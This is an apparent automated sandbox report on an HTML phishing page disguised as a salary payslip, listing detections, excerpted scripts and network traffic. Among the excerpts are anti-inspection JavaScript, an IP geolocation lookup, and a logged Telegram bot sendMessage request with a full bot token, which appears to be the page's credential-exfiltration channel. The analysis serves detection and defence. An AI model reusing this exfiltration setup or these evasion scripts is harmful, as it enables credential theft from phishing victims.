Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html

Overview

General Information

Sample name:Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html
Analysis ID:1567180
MD5:90a463a44208b31e07db0e080d6012bc
SHA1:3d7a6601c88a6622757f68fd80b32bfbf8834460
SHA256:165fa0473c1ea38af7a2c40e467d8597ea684516e545930c5ff724df8f6e4f0e
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML Script injector detected
HTML document with suspicious name
HTML document with suspicious title
HTML file submission containing password form
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Suspicious Javascript code found in HTML file
Uses the Telegram API (likely for C&C communication)
Detected hidden input values containing email addresses (often used in phishing pages)
HTML body contains password input but no form action
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Javascript checks online IP of machine
None HTTPS page querying sensitive user data (password, username or email)

Classification

  • System is w10x64
  • chrome.exe (PID: 3180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2024,i,11557377144956584876,17770760742759118039,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.3.pages.csv
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.3.pages.csv, type: HTML
          Source: Yara matchFile source: 1.2.pages.csv, type: HTML
          Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: Script contains multiple high-risk indicators: 1) Use of base64 decoding (atob) with obfuscated input string, 2) Appears to be manipulating email address data, 3) The obfuscated string pattern suggests potential malicious intent to hide actual payload. The combination of email handling and obfuscated code is particularly concerning for potential data exfiltration or phishing attempts.
          Source: 1.9..script.csvJoe Sandbox AI: Detected suspicious JavaScript: This code shows multiple high-risk indicators: heavy obfuscation using hex encoding (_0x format), usage of unescape() function, and document.write() for DOM manipulation. The code appears to be creating a hidden execution context and includes encoded HTML content. These are common characteristics of malicious scripts designed to hide their true purpose.
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: New script tag found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: New script tag found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: New script tag found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: New script tag found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlTab title: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: window.addeventlistener('keydown', async (e) => { if (e.ctrlkey && (e.which == 83)) { e.preventdefault(); return false; } }); window.addeventlistener('contextmenu', event => event.preventdefault()); document.onkeydown = function (e) { if (event.keycode == 123) { return false; } if (e.ctrlkey && e.keycode == 'e'.charcodeat(0)) { return false; } if (e.ctrlkey && e.shiftkey && e.keycode == 'i'.charcodeat(0)) { return false; } if (e.ctrlkey && e.shiftkey && e.keycode == 'j'.charcodeat(0)) { return false; } if (e.ctrlkey && e.keycode == 'u'.charcodeat(0)) { return false; } if (e.ctrlkey && e.keycode == 's'.charcodeat(0)) { return false; } if (e.ctrlkey && e.keycode == 'h'.charcodeat(0)) { return false; } if (e.ctrlkey && e.keycode == 'a'.charcodeat(0)) { ...
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: window.addeventlistener('keydown', async (e) => { if (e.ctrlkey && (e.which == 83)) { e.preventdefault(); return false; } }); window.addeventlistener('contextmenu', event => event.preventdefault()); document.onkeydown = function (e) { if (event.keycode == 123) { return false; } if (e.ctrlkey && e.keycode == 'e'.charcodeat(0)) { return false; } if (e.ctrlkey && e.shiftkey && e.keycode == 'i'.charcodeat(0)) { return false; } if (e.ctrlkey && e.shiftkey && e.keycode == 'j'.charcodeat(0)) { return false; } if (e.ctrlkey && e.keycode == 'u'.charcodeat(0)) { return false; } if (e.ctrlkey && e.keycode == 's'.charcodeat(0)) { return false; } if (e.ctrlkey && e.keycode == 'h'.charcodeat(0)) { return false; } if (e.ctrlkey && e.keycode == 'a'.charcodeat(0)) { ...
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlHTTP Parser: document.write
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: Hbardien@itnaledi.co.za
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: Title: does not match URL
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: $(document).ready(function() {var endpoint = 'http://ip-api.com/json/?fields=status,country,regionname,city,query';var xhr = new xmlhttprequest();xhr.onreadystatechange = function() {if (this.readystate == 4 && this.status == 200) {var response = json.parse(this.responsetext);if(response.status == 'success') {$("#gfg").html(response.query + '\r\nregion: ' + response.regionname + '\r\ncity: ' + response.city + '\r\ncountry: ' + response.country);}}};xhr.open('get', endpoint, true);xhr.send()});
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: Has password / email / username input fields
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: <input type="password" .../> found
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No favicon
          Source: https://www.itnaledi.co.za/HTTP Parser: No favicon
          Source: https://www.itnaledi.co.za/HTTP Parser: No favicon
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No <meta name="author".. found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No <meta name="copyright".. found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No <meta name="copyright".. found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No <meta name="copyright".. found
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49773 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49910 version: TLS 1.2

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
          Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 13.227.8.72 13.227.8.72
          Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.56.5
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.56.5
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.56.5
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.56.5
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.56.5
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NhOYamuYEUBDEwV&MD=h57hdrmx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /AD.js HTTP/1.1Host: branched-versed-session.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /AD.js HTTP/1.1Host: branched-versed-session.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.1/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /itnaledi.co.za HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /itnaledi.co.za HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NhOYamuYEUBDEwV&MD=h57hdrmx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
